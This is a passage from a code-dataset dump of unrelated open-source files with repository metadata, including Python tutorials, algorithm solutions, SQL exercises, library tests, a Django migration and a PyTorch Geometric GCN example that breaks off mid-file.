d1900ff21a19661ac3e69e12f66c9c60ad141073 | c838b6a37a7499e184bb892cd40f2f1fbb79002d | /Livro Python/CursoPython/progs/p018_funcoes_pre_definidas.py | a59c499ce4fec27ecd469eb002ad4ca22052a29c | [] | no_license | danbailo/Python | f2920dd420a9ead29e6f38b64f0b38af0d1b5dbf | 3e3113d26bf9aee39e1ab4a3b2881c4c328143f3 | refs/heads/master | 2021-07-24T02:13:41.612337 | 2020-05-14T22:58:32 | 2020-05-14T22:58:32 | 169,300,125 | 1 | 1 | null | 2019-09-03T15:20:29 | 2019-02-05T19:35:09 | Python | UTF-8 | Python | false | false | 837 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Jan 24 13:27:19 2019
@author: notebook
"""
#P018: funções pré-definidas
#funções numéricas
n1=100
n2=3.141592653
n3=9.99
print(abs(1000), abs(-500), abs(2 * -2.5), abs(0)) #1000 500 5.0 0
print(pow(n1,2)) #10000
print(round(n2,2)) #3.14
print(round(n2), round(n3)) #3 10
#funções de conversão
s1='5'
s2='9.99'
print(int(s1)) #converteu '5' -> 5
print(float(s2)) #converteu '9.99' -> 9.99
print('O valor de PI com 10 digitos é: ' + str(n2))
print('O valor de PI com 2 digitos é: ' + str(round(n2,2)))
#funções de string
s1='python'
s2='inconstitucional'
print(len(s1)) #6
print(len(s2)) #16
print(max(s1)) #'y'
print(min(s1)) #'h'
| [
"danbailoufms@gmail.com"
] | danbailoufms@gmail.com |
b00b867066a7fc05e9273233d2367e6c09c2f814 | 8698757521458c2061494258886e5d3cdfa6ff11 | /argo/core/plotComparisonsCurves-by-model.py | f1dfe25255275fc69e13974848d02a4467f90690 | [
"MIT"
] | permissive | ricvo/argo | 546c91e84d618c4bc1bb79a6bc7cba01dca56d57 | a10c33346803239db8a64c104db7f22ec4e05bef | refs/heads/master | 2023-02-25T01:45:26.412280 | 2020-07-05T22:55:35 | 2020-07-05T22:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,081 | py | import argparse
from argo.core.utils.PlotCurves import PlotCurves
# CLI: one positional argument naming the experiments config file.
parser = argparse.ArgumentParser(description='Plot curves from different txt log files to compare experiments', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('conf_file', help='The config file with the details of the experiments')
args = parser.parse_args()
argv = ["dummy", args.conf_file]
# NOTE(review): eval() executes arbitrary code from the config file --
# only run with trusted configs (ast.literal_eval would be safer).
conf_file = eval(open(args.conf_file, 'r').read())
for stp in [0.1, 0.2, 0.3, 0.4]:
    for zsc in [1.0, 2.0, 4.0]:
        # Fresh copy per (stp, zsc) pair so mutations don't accumulate.
        conf = conf_file.copy()
        print(stp, zsc)
        conf['where'] = [('stp', str(stp), 1)]
        # Block every zoom-scale curve except the current one.
        conf['block'] = [("zsc", "1.0", 4), ("zsc", "1.5", 4), ("zsc", "2.0", 4), ("zsc", "2.5", 4), ("zsc", "3.0", 4), ("zsc", "3.5", 4), ("zsc", "4.0", 4), ("zsc", "6.0", 4), ("zsc", "8.0", 4)]
        conf['block'].remove(("zsc", str(zsc), 4))
        conf['legend'] = [("rec", 1, "model "), ("d", 1, "denoising ")]
        # Output tag encodes the current parameter combination.
        tag = 'various-models' + '_stp' + str(stp) + '_zsc' + str(zsc)
        conf['tag'] = tag
        pc = PlotCurves()
        pc.plot(**conf)
| [
"volpi@rist.ro"
] | volpi@rist.ro |
e74e4c2c954fee237c5bcee61f390972ef165d37 | 880d9cc2704f7de649ad4455dd7ec2806b6a9e95 | /Day05/daffodils_number.py | c2baf5ed048155e457be87ab63511d532c27bf15 | [] | no_license | shunz/Python-100-Days_Practice | 14795757effcff50a4644f57c5c109fa1c9c38ac | 82f508ff6911ce3aa5c5a69cd481a6cc87f02258 | refs/heads/master | 2020-12-26T18:52:32.755384 | 2020-04-07T15:49:36 | 2020-04-07T15:49:36 | 237,604,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 319 | py | '''
找出所有水仙花数
Ver: 0.1
Auther: Shunz
'''
def four_digit_narcissistic_numbers(power=4):
    """Return all 4-digit numbers equal to the sum of each digit raised
    to *power*.

    :param power: exponent applied to each digit (default 4, giving the
        classic four-digit narcissistic / Armstrong numbers)
    :return: sorted list of matching numbers
    """
    return [num for num in range(1000, 10000)
            if num == sum(int(digit) ** power for digit in str(num))]


# Print each match on its own line -- identical output to the original
# per-digit arithmetic loop (1634, 8208, 9474).
for num in four_digit_narcissistic_numbers():
    print(num)
| [
"rockucn@gmail.com"
] | rockucn@gmail.com |
31f06b0c3f001267f808fab05e9a9c1dd91fb836 | 60044c76b631e622edb28f3a74971ce06211fac5 | /Python-for-Everybody/Python-Network-Data/networked-programs/urlwords.py | a00af7d0edd395ad9d324c5bbac994006a77943e | [] | no_license | NestorMonroy/Courses-coursera | 8d45a858c79567d74f013ac27ac33d47e43abb96 | 98ac1aa5bb0cd9da5cea5be02995d5b65c779201 | refs/heads/master | 2023-08-14T13:36:07.348994 | 2021-09-22T06:13:57 | 2021-09-22T06:13:57 | 327,753,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | import urllib.request as request
def count_words(lines):
    """Tally whitespace-separated words in an iterable of byte strings.

    :param lines: iterable yielding ``bytes`` (e.g. an HTTP response)
    :return: dict mapping word -> number of occurrences
    """
    counts = {}
    for line in lines:
        words = line.decode().split()
        for word in words:
            # Bug fix: the original assigned into an undefined name
            # `contador` (NameError on the first word); the tally dict
            # is `counts`.
            counts[word] = counts.get(word, 0) + 1
    return counts


if __name__ == '__main__':
    # Fetch the text and print its word-frequency table.
    fhand = request.urlopen('http://data.pr4e.org/romeo.txt')
    counts = count_words(fhand)
    print(counts)
| [
"nestor.monroy.90@gmail.com"
] | nestor.monroy.90@gmail.com |
0ace7d7d527c28835ae59194c09c1d32648d05c1 | ecf0d106831b9e08578845674a457a166b6e0a14 | /OOP/EXAMS/aug_16_2020/project/software/software.py | 0c54a9287d2940f00a6ad5448f4e70e830ae1154 | [] | no_license | ivo-bass/SoftUni-Solutions | 015dad72cff917bb74caeeed5e23b4c5fdeeca75 | 75612d4bdb6f41b749e88f8d9c512d0e00712011 | refs/heads/master | 2023-05-09T23:21:40.922503 | 2021-05-27T19:42:03 | 2021-05-27T19:42:03 | 311,329,921 | 8 | 5 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | class Software:
    def __init__(self, name: str, type: str, capacity_consumption: int, memory_consumption: int):
        """Store the software's identity and resource requirements.

        :param name: display name of the software
        :param type: software category (note: parameter shadows the
            builtin ``type``; name kept for caller compatibility)
        :param capacity_consumption: storage capacity the software uses
        :param memory_consumption: memory the software uses
        """
        self.name = name
        self.type = type
        self.capacity_consumption = capacity_consumption
        self.memory_consumption = memory_consumption
| [
"ivailo.ignatoff@gmail.com"
] | ivailo.ignatoff@gmail.com |
50a595efd00708731c461b647a40b283b5ad46fa | 2420a09930fcc1a0d3c67a0791be70ddee418f4a | /House_Robber.py | 8efb6e183657f26dcceb82ff35a604d6ee75a55c | [] | no_license | Superbeet/LeetCode | eff8c2562fb5724b89bc2b05ab230a21b67a9e5a | a1b14fc7ecab09a838d70e0130ece27fb0fef7fd | refs/heads/master | 2020-04-06T03:34:10.973739 | 2018-02-13T00:57:06 | 2018-02-13T00:57:06 | 42,485,335 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,222 | py | class Solution(object):
    def rob(self, nums):
        """House Robber I: maximum loot from a row of houses where no two
        adjacent houses may both be robbed (O(n) time, O(n) space DP).

        :type nums: List[int]
        :rtype: int
        """
        size = len(nums)
        if size==0:
            return 0
        if size==1:
            return nums[0]
        # s[i] = best total considering houses 0..i
        s = [0 for i in range(size)]
        s[0] = nums[0]
        s[1] = max(nums[0], nums[1])
        for i in xrange(2, size):
            # Either rob house i (plus best up to i-2) or skip it.
            s[i] = max(s[i-2]+nums[i], s[i-1])
        return s[-1]
# Quick demo (Python 2 print statement): expected answer is 2
# (rob houses 0 and 2).
sol = Solution()
n = [1,1,1]
print sol.rob(n)
class Solution(object):
    # House Robber II: the houses form a circle, so the first and last
    # house are adjacent. (This class shadows the earlier Solution.)
    def rob(self, nums):
        """Best loot on a circular street: take the better of robbing the
        row without its first house or without its last house.

        :type nums: List[int]
        :rtype: int
        """
        if not nums:
            return 0
        elif len(nums)==1:
            return nums[0]
        return max( self.do_rob(nums[1:]), self.do_rob(nums[:-1]) )
    def do_rob(self, nums):
        """Linear house-robber DP using a rolling two-slot array
        (O(1) extra space).

        :type nums: List[int]
        :rtype: int
        """
        if len(nums)==1:
            return nums[0]
        size = len(nums)
        dp = [0, 0]
        dp[0] = nums[0]
        dp[1] = max(nums[0],nums[1])
        for i in xrange(2, size):
            # dp[i%2] = best up to house i; the other slot holds i-1.
            dp[i%2] = max(dp[(i-1)%2], dp[(i-2)%2] + nums[i])
        return dp[(size-1)%2]
| [
"aslan.yeh2010@gmail.com"
] | aslan.yeh2010@gmail.com |
9667831ff9441ba8ecb65a87e049995c3bc1b423 | 52ad58b5412f9124822283d168391e5e2b8fa150 | /MySQL/day60/练习题(六)05.py | 7eaba43c215cf40936d0adc65577cd550d254437 | [] | no_license | JiangHuYiXiao/PythonStudy | 69ad9795faaf24a6166ab21cae564f6461e1363e | aeebce2cacbf3757d25c8c4d24d15639e0bb8e37 | refs/heads/master | 2021-08-17T16:54:43.477502 | 2021-08-11T01:06:11 | 2021-08-11T01:06:11 | 153,078,386 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,793 | py | # -*- coding:utf-8 -*-
# @Author : 江湖一笑
# @Time : 2019/12/6 8:24
# @Software : Python_study
# @Python_verison : 3.7
# (typo "verison" preserved from the original header; this file only
#  holds SQL practice answers in the module docstring below -- nothing
#  here executes.)
'''
-- 21、删除学习“李平”老师课的score表记录
DELETE from t_score score where score.score_course_id in(
select course.course_id from t_teacher teacher inner join t_course course on teacher.teacher_id=course.c_teacher_id where teacher.tname='李平老师');
-- 22、向SC表中插入一些记录,这些记录要求符合以下条件:①没有上过编号“002”课程的同学学号;②插入“002”号课程的平均成绩;
insert into t_score(score_student_id,score_course_id,score_number)
select score_student_id,4,(select avg(score_number) from t_score where score_course_id=2) from t_score score where score.score_course_id!=2 group by score_student_id;
-- 23、按平均成绩从低到高 显示所有学生的“生物”、“物理”、“体育”三门的课程成绩,按如下形式显示: 学生ID,生物,物理,体育,有效课程数,有效平均分
select score_student_id,
(select score_number from t_score as sw where score_course_id in(select course_id from t_course where course_name='生物') and sw.score_student_id= sc.score_student_id )as 生物成绩,
(select score_number from t_score as wl where score_course_id in(select course_id from t_course where course_name='物理') and wl.score_student_id= sc.score_student_id) as 物理成绩,
(select score_number from t_score as ty where score_course_id in(select course_id from t_course where course_name='体育') and ty.score_student_id= sc.score_student_id) as 体育成绩,
count(sc.score_course_id) as 有效课程数,
avg(sc.score_number) as 平均成绩
from t_score as sc group by sc.score_student_id order by 平均成绩;
''' | [
"1163270704@qq.com"
] | 1163270704@qq.com |
5c7b5be0c3377aee4f27e5cb4f47f95ad65c5291 | e03d98c557a8e71d4c55d5e67b6381188213cfc4 | /tests/test_async_aiohttp.py | b367c7948e4b45730fcf54804f8e2e86d3734436 | [
"MIT"
] | permissive | lericson/python-engineio | a0ab138d6535fc75b04df5ddb1f8dee057926fc9 | b8ac261440c8e55826f7743131e65c0d2e2d1dc8 | refs/heads/master | 2021-01-19T03:59:56.972405 | 2017-04-05T18:57:46 | 2017-04-05T18:57:46 | 87,345,583 | 0 | 0 | null | 2017-04-05T18:54:56 | 2017-04-05T18:54:56 | null | UTF-8 | Python | false | false | 2,262 | py | import sys
import unittest
import six
if six.PY3:
from unittest import mock
else:
import mock
if sys.version_info >= (3, 5):
from aiohttp import web
from engineio import async_aiohttp
@unittest.skipIf(sys.version_info < (3, 5), 'only for Python 3.5+')
class AiohttpTests(unittest.TestCase):
    """Unit tests for the engineio aiohttp async backend helpers."""

    @mock.patch('aiohttp.web_urldispatcher.UrlDispatcher.add_route')
    def test_create_route(self, add_route):
        """create_route registers GET and POST handlers on the app."""
        app = web.Application()
        mock_server = mock.MagicMock()
        async_aiohttp.create_route(app, mock_server, '/foo')
        # Fix: removed leftover debug print of add_route.call_args_list.
        add_route.assert_any_call('GET', '/foo', mock_server.handle_request,
                                  name=None)
        add_route.assert_any_call('POST', '/foo', mock_server.handle_request)

    def test_translate_request(self):
        """translate_request builds a WSGI-style environ from an aiohttp
        request object."""
        request = mock.MagicMock()
        request._message.method = 'PUT'
        request._message.path = '/foo/bar?baz=1'
        request._message.version = (1, 1)
        # 'c-c' and 'c_c' normalize to the same WSGI key HTTP_C_C and are
        # comma-joined; dict order is unspecified, so checked separately.
        request._message.headers = {'a': 'b', 'c-c': 'd', 'c_c': 'e',
                                    'content-type': 'application/json',
                                    'content-length': 123}
        request._payload = b'hello world'
        environ = async_aiohttp.translate_request(request)
        expected_environ = {
            'REQUEST_METHOD': 'PUT',
            'PATH_INFO': '/foo/bar',
            'QUERY_STRING': 'baz=1',
            'CONTENT_TYPE': 'application/json',
            'CONTENT_LENGTH': 123,
            'HTTP_A': 'b',
            'RAW_URI': '/foo/bar?baz=1',
            'SERVER_PROTOCOL': 'HTTP/1.1',
            'wsgi.input': b'hello world',
            'aiohttp.request': request,
        }
        for k, v in expected_environ.items():
            self.assertEqual(v, environ[k])
        self.assertTrue(
            environ['HTTP_C_C'] == 'd,e' or environ['HTTP_C_C'] == 'e,d')

    @mock.patch('engineio.async_aiohttp.aiohttp.web.Response')
    def test_make_response(self, Response):
        """make_response forwards payload/status/headers to aiohttp."""
        async_aiohttp.make_response('202 ACCEPTED', 'headers', 'payload')
        Response.assert_called_once_with(body='payload', status=202,
                                         headers='headers')
| [
"miguel.grinberg@gmail.com"
] | miguel.grinberg@gmail.com |
4404bd2de276bf325541d1d7e6eedbd11d469731 | d41d18d3ea6edd2ec478b500386375a8693f1392 | /plotly/validators/parcoords/_labelfont.py | 0071e780aa370bfd67d410d8abb3787b40b3ce5f | [
"MIT"
] | permissive | miladrux/plotly.py | 38921dd6618650d03be9891d6078e771ffccc99a | dbb79e43e2cc6c5762251537d24bad1dab930fff | refs/heads/master | 2020-03-27T01:46:57.497871 | 2018-08-20T22:37:38 | 2018-08-20T22:37:38 | 145,742,203 | 1 | 0 | MIT | 2018-08-22T17:37:07 | 2018-08-22T17:37:07 | null | UTF-8 | Python | false | false | 1,404 | py | import _plotly_utils.basevalidators
class LabelfontValidator(_plotly_utils.basevalidators.CompoundValidator):
    """Validator for the `parcoords.labelfont` compound property.

    Generated-style plotly validator: delegates to CompoundValidator with
    the target data class name and its user-facing field docs.
    """

    def __init__(
        self, plotly_name='labelfont', parent_name='parcoords', **kwargs
    ):
        super(LabelfontValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            data_class_str='Labelfont',
            data_docs="""
            color
            family
                HTML font family - the typeface that will be
                applied by the web browser. The web browser
                will only be able to apply a font if it is
                available on the system which it operates.
                Provide multiple font families, separated by
                commas, to indicate the preference in which to
                apply fonts if they aren't available on the
                system. The plotly service (at https://plot.ly
                or on-premise) generates images on a server,
                where only a select number of fonts are
                installed and supported. These include *Arial*,
                *Balto*, *Courier New*, *Droid Sans*,, *Droid
                Serif*, *Droid Sans Mono*, *Gravitas One*, *Old
                Standard TT*, *Open Sans*, *Overpass*, *PT Sans
                Narrow*, *Raleway*, *Times New Roman*.
            size
            """,
            **kwargs
        )
| [
"adam.kulidjian@gmail.com"
] | adam.kulidjian@gmail.com |
21b3fee356fb5ab145b84d2004d1ad7fcd8e7084 | 5e84763c16bd6e6ef06cf7a129bb4bd29dd61ec5 | /blimgui/dist/OpenGL/raw/GLES2/DMP/program_binary.py | 0b25e6095d1a0667f2ba60eac77ec7424b8d7956 | [
"MIT"
] | permissive | juso40/bl2sdk_Mods | 8422a37ca9c2c2bbf231a2399cbcb84379b7e848 | 29f79c41cfb49ea5b1dd1bec559795727e868558 | refs/heads/master | 2023-08-15T02:28:38.142874 | 2023-07-22T21:48:01 | 2023-07-22T21:48:01 | 188,486,371 | 42 | 110 | MIT | 2022-11-20T09:47:56 | 2019-05-24T20:55:10 | Python | UTF-8 | Python | false | false | 727 | py | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLES2 import _types as _cs
# End users want this...
from OpenGL.raw.GLES2._types import *
from OpenGL.raw.GLES2 import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLES2_DMP_program_binary'
def _f( function ):
    # Wrap a ctypes function definition for the GLES2 platform, attaching
    # the standard GLES2 error checker.
    return _p.createFunction( function,_p.PLATFORM.GLES2,'GLES2_DMP_program_binary',error_checker=_errors._error_checker)
# Extension tokens (GLenum constants) for DMP_program_binary.
GL_DMP_PROGRAM_BINARY_DMP=_C('GL_DMP_PROGRAM_BINARY_DMP',0x9253)
GL_SMAPHS30_PROGRAM_BINARY_DMP=_C('GL_SMAPHS30_PROGRAM_BINARY_DMP',0x9251)
GL_SMAPHS_PROGRAM_BINARY_DMP=_C('GL_SMAPHS_PROGRAM_BINARY_DMP',0x9252)
| [
"justin.sostmann@googlemail.com"
] | justin.sostmann@googlemail.com |
13824e5db65b787a297ff8e433c656e2564c8486 | ac42f1d918bdbd229968cea0954ed75250acd55c | /admin/dashboard/openstack_dashboard/test/integration_tests/pages/identity/projectspage.py | b2821020f8449b27d7e86f8c037a8f0a2716dcf4 | [
"Apache-2.0"
] | permissive | naanal/product | 016e18fd2f35608a0d8b8e5d2f75b653bac7111a | bbaa4cd60d4f2cdda6ce4ba3d36312c1757deac7 | refs/heads/master | 2020-04-03T22:40:48.712243 | 2016-11-15T11:22:00 | 2016-11-15T11:22:00 | 57,004,514 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,876 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack_dashboard.test.integration_tests.pages import basepage
from openstack_dashboard.test.integration_tests.regions import forms
from openstack_dashboard.test.integration_tests.regions import tables
class ProjectsTable(tables.TableRegion):
    """Page-object region for the Identity -> Projects table."""

    name = 'tenants'
    # One tab holding the three fields of the "Create Project" form.
    CREATE_PROJECT_FORM_FIELDS = (("name", "description", "enabled"),)

    @tables.bind_table_action('create')
    def create_project(self, create_button):
        # Open the creation dialog and return its tabbed form region.
        create_button.click()
        return forms.TabbedFormRegion(
            self.driver, self.conf,
            field_mappings=self.CREATE_PROJECT_FORM_FIELDS)

    @tables.bind_table_action('delete')
    def delete_project(self, delete_button):
        # Open the delete-confirmation dialog and return it.
        delete_button.click()
        return forms.BaseFormRegion(self.driver, self.conf, None)
class ProjectsPage(basepage.BaseNavigationPage):
    """Page object for the Identity -> Projects dashboard page."""

    DEFAULT_ENABLED = True
    PROJECTS_TABLE_NAME_COLUMN = 'name'
    PROJECT_ID_TABLE_NAME_COLUMN = 'id'

    def __init__(self, driver, conf):
        super(ProjectsPage, self).__init__(driver, conf)
        self._page_title = "Projects"

    @property
    def projects_table(self):
        return ProjectsTable(self.driver, self.conf)

    def _get_row_with_project_name(self, name):
        # Row whose 'name' column matches, or a falsy value if absent.
        return self.projects_table.get_row(self.PROJECTS_TABLE_NAME_COLUMN,
                                           name)

    def create_project(self, project_name, description=None,
                       is_enabled=DEFAULT_ENABLED):
        """Fill in and submit the Create Project form."""
        create_project_form = self.projects_table.create_project()
        create_project_form.name.text = project_name
        if description is not None:
            create_project_form.description.text = description
        if not is_enabled:
            # The form defaults to enabled; only untick when disabling.
            create_project_form.enabled.unmark()
        create_project_form.submit()

    def delete_project(self, project_name):
        """Select the named project and confirm its deletion."""
        row = self._get_row_with_project_name(project_name)
        row.mark()
        modal_confirmation_form = self.projects_table.delete_project()
        modal_confirmation_form.submit()

    def is_project_present(self, project_name):
        """Return True when a project with this name is listed."""
        return bool(self._get_row_with_project_name(project_name))

    def get_project_id_from_row(self, name):
        """Return the id-column text for the named project's row."""
        row = self._get_row_with_project_name(name)
        return row.cells[self.PROJECT_ID_TABLE_NAME_COLUMN].text
| [
"rajagopalx@gmail.com"
] | rajagopalx@gmail.com |
b52e15cdb511e310d4d1e83f61679dfc82dd7170 | c52a0caadda820b7bdb506cfb8820310ba96027b | /Python网络爬虫基础与实战教程/13_selenium详解/12_cookies.py | 48cff2b82b0391920a6754126a23c6ca3b508e25 | [] | no_license | liangjinhao/Web_Spider_Practice_Code | 1d29939013358889226ce2be61c9d2dc4ec51bd2 | dda804ba4f4f32cf4325d56900556525ffaa9600 | refs/heads/master | 2020-04-23T19:10:43.853205 | 2018-07-14T12:39:35 | 2018-07-14T12:39:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | # !/usr/bin/env python
# -*- coding:utf-8 -*-
# author: Fangyang time:2017/12/18
from selenium import webdriver
# Cookie-handling demo with Selenium: read, add, then clear cookies.
browser = webdriver.Chrome()
browser.get('https://www.zhihu.com/explore')
# Cookies the site set on load.
print(browser.get_cookies())
# Add a custom cookie and show it is now present.
browser.add_cookie({'name':'name','domain':'www.zhihu.com','value':'germey'})
print(browser.get_cookies())
# Clearing all cookies leaves an empty jar.
browser.delete_all_cookies()
print(browser.get_cookies())
"fangyang.jing@hotmail.com"
] | fangyang.jing@hotmail.com |
6198fa221a84d22f9942ff988ccd09cd61fcbc2e | 06f0ae3ecaaf47b1c23e231838afa524d8446f5e | /lobby/migrations/0002_contestbanner_promotionbanner.py | 763a0cde3147cff22c6b1eb20d6cfed4268a5ba5 | [] | no_license | nakamotohideyoshi/draftboard-web | c20a2a978add93268617b4547654b89eda11abfd | 4796fa9d88b56f80def011e2b043ce595bfce8c4 | refs/heads/master | 2022-12-15T06:18:24.926893 | 2017-09-17T12:40:03 | 2017-09-17T12:40:03 | 224,877,650 | 0 | 0 | null | 2022-12-08T00:02:57 | 2019-11-29T15:20:17 | Python | UTF-8 | Python | false | false | 2,784 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated migration: adds the ContestBanner and
    PromotionBanner models (do not hand-edit applied migrations)."""

    dependencies = [
        ('contest', '0002_contest_currentcontest_entry_historycontest_livecontest_lobbycontest_upcomingcontest'),
        ('lobby', '0001_initial'),
    ]

    operations = [
        # Banner tied to a specific contest via a ForeignKey.
        migrations.CreateModel(
            name='ContestBanner',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('modified', models.DateTimeField(auto_now=True)),
                ('internal_description', models.CharField(max_length=2048, default='', help_text='PRIVATE description of what this banner is for. should not displayed on the front end')),
                ('start_time', models.DateTimeField(help_text='do not display the banner before the start time')),
                ('end_time', models.DateTimeField(help_text='all good things must come to an end. and you need to specify the time when this banner should no longer be displayed.')),
                ('image_url', models.URLField(null=True, help_text='a public link to the image for this banner')),
                ('links_to', models.URLField(null=True, help_text='if you want the banner to be clickable, then you should add a link here')),
                ('contest', models.ForeignKey(to='contest.Contest')),
            ],
            options={
                'abstract': False,
            },
        ),
        # Same banner fields without the contest relation.
        migrations.CreateModel(
            name='PromotionBanner',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('modified', models.DateTimeField(auto_now=True)),
                ('internal_description', models.CharField(max_length=2048, default='', help_text='PRIVATE description of what this banner is for. should not displayed on the front end')),
                ('start_time', models.DateTimeField(help_text='do not display the banner before the start time')),
                ('end_time', models.DateTimeField(help_text='all good things must come to an end. and you need to specify the time when this banner should no longer be displayed.')),
                ('image_url', models.URLField(null=True, help_text='a public link to the image for this banner')),
                ('links_to', models.URLField(null=True, help_text='if you want the banner to be clickable, then you should add a link here')),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
| [
"cbanister@coderden.com"
] | cbanister@coderden.com |
fb9fd0867506e770a516bef3dadb36b1c421312d | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_201/1830.py | 2f0e9516d36c5abe37be6a6931f4c8761a1f70dd | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,980 | py | #!/usr/bin/env python
from __future__ import absolute_import
import sys
import unittest
from StringIO import StringIO
# Sample input/output from the problem statement; the trailing [1:]
# strips the newline right after the opening triple quote.
sample_in = \
"""
5
4 2
5 2
6 2
1000 1000
1000 1
"""[1:]

sample_out = \
"""
Case #1: 1 0
Case #2: 1 0
Case #3: 1 1
Case #4: 0 0
Case #5: 500 499
"""[1:]
def run(in_buf=sys.stdin, out_buf=sys.stdout):
    """Solve every test case (Python 2 code): simulate K people each
    taking the free stall that maximizes the distance to the nearest
    occupied stall/wall, ties broken by the farther side, then report
    the last person's (max, min) distances."""
    cases = int(in_buf.readline())
    for c in xrange(1, cases+1):
        out_buf.write("Case #%s: " % c)
        N,K = [int(s) for s in in_buf.readline().split(" ")]
        max_min = 0
        max_max = 0
        stalls = [0]*N  # 1 = occupied
        # deltas[j] = [distance to nearest occupied on the left,
        #              distance to nearest occupied on the right]
        deltas = []
        for j in xrange(N):
            deltas.append([0, 0])
        for i in xrange(K):
            # One forward and one backward sweep (done together via the
            # negative index) refresh both distances for every stall.
            l = 0
            r = 0
            for j in xrange(N):
                if not stalls[j]:
                    deltas[j][0] = l
                    l += 1
                else:
                    l = 0
                if not stalls[-(j+1)]:
                    deltas[-(j+1)][1] = r
                    r += 1
                else:
                    r = 0
            # Candidates: free stalls maximizing min(left, right), then
            # max(left, right) as the tie-breaker.
            dist = [[ind, min(m), max(m)] for ind, m in enumerate(deltas) if not stalls[ind]]
            max_min = max([x[1] for x in dist])
            dist = [d for d in dist if d[1] == max_min]
            if len(dist) > 1:
                max_max = max([x[2] for x in dist])
                dist = [d for d in dist if d[2] == max_max]
            elif not len(dist):
                print "FAIL"
            max_min = dist[0][1]
            max_max = dist[0][2]
            pos = dist[0][0]
            stalls[pos] = 1  # occupy the chosen stall
        out_buf.write("{} {}\n".format(max_max, max_min))
class Case2017QC(unittest.TestCase):
    def test_run(self):
        # Run the solver repeatedly on the sample data and compare lines
        # (repetition guards against accidental nondeterminism).
        for i in xrange(20):
            sample_in_buf = StringIO(sample_in)
            output = StringIO()
            run(sample_in_buf, output)
            self.assertSequenceEqual(sample_out.splitlines(), output.getvalue().splitlines())

if __name__ == '__main__':
    # Direct invocation solves stdin -> stdout (contest mode).
    run()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
6375c702b93fc71da45a77ff44b3349477fc0279 | e0045eec29aab56212c00f9293a21eb3b4b9fe53 | /base_import_module/tests/test_module/__manifest__.py | 260330237ca86dcd58e9202e77e1189a162ad12f | [] | no_license | tamam001/ALWAFI_P1 | a3a9268081b9befc668a5f51c29ce5119434cc21 | 402ea8687c607fbcb5ba762c2020ebc4ee98e705 | refs/heads/master | 2020-05-18T08:16:50.583264 | 2019-04-30T14:43:46 | 2019-04-30T14:43:46 | 184,268,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | # -*- coding: utf-8 -*-
# Part of ALWAFI. See LICENSE file for full copyright and licensing details.
{
'name': 'Test Module',
'category': 'Website',
'summary': 'Custom',
'version': '1.0',
'description': """
Test
""",
'depends': ['website'],
'data': [
'test.xml',
],
'installable': True,
'application': True,
}
| [
"50145400+gilbertp7@users.noreply.github.com"
] | 50145400+gilbertp7@users.noreply.github.com |
bff3a7e8667e7ffb5d025678ec5459419639193c | 8f439e50c741483ffefd5bad16f11d4b60da8fe9 | /examples/gcn2_cora.py | 4a6e2dc914712dafa0e2c6fbfe309024bea5cb3d | [
"MIT"
] | permissive | sumanthratna/pytorch_geometric | 19d66b6cc874fbce9207efc204a0ed1f9bb04d88 | 9c6a069c995cac38e4f3a2f1e9cfc7cebac889c6 | refs/heads/master | 2023-08-29T09:58:33.807755 | 2021-09-08T16:00:09 | 2021-09-08T16:00:09 | 404,423,682 | 2 | 0 | MIT | 2021-09-08T20:58:23 | 2021-09-08T16:44:15 | null | UTF-8 | Python | false | false | 2,928 | py | import os.path as osp
import torch
from torch.nn import Linear
import torch.nn.functional as F
from torch_geometric.datasets import Planetoid
import torch_geometric.transforms as T
from torch_geometric.nn import GCN2Conv
from torch_geometric.nn.conv.gcn_conv import gcn_norm
dataset = 'Cora'
path = osp.join(osp.dirname(osp.realpath(__file__)), '..', 'data', dataset)
transform = T.Compose([T.NormalizeFeatures(), T.ToSparseTensor()])
dataset = Planetoid(path, dataset, transform=transform)
data = dataset[0]
data.adj_t = gcn_norm(data.adj_t) # Pre-process GCN normalization.
class Net(torch.nn.Module):
def __init__(self, hidden_channels, num_layers, alpha, theta,
shared_weights=True, dropout=0.0):
super(Net, self).__init__()
self.lins = torch.nn.ModuleList()
self.lins.append(Linear(dataset.num_features, hidden_channels))
self.lins.append(Linear(hidden_channels, dataset.num_classes))
self.convs = torch.nn.ModuleList()
for layer in range(num_layers):
self.convs.append(
GCN2Conv(hidden_channels, alpha, theta, layer + 1,
shared_weights, normalize=False))
self.dropout = dropout
def forward(self, x, adj_t):
